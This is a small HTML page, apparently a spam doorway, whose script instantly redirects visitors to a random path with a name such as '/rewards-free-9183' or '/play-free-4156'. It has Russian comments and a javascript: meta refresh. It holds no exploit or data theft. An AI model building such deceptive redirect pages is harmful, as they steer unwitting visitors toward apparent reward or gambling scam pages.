<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Redirecting...</title>
    <meta http-equiv="refresh" content="0; url='javascript:redirect()'">
    <script>
    const sites = ["/victory-top-5566", "/play-free-4156", "/rewards-free-9183", "/rewards-win-1081", "/rewards-limit-9470", "/rewards-limit-9747", "/support-club-9791", "/club-best-7259", "/win-global-2633", "/play-global-3399"];
    function redirect() {
        const randomUrl = sites[Math.floor(Math.random() * sites.length)];
        window.location.href = randomUrl;
    }
    redirect(); // Запускаем немедленно
    </script>
</head>
<body>
    <!-- Пустая страница. Редирект происходит мгновенно. -->
</body>
</html>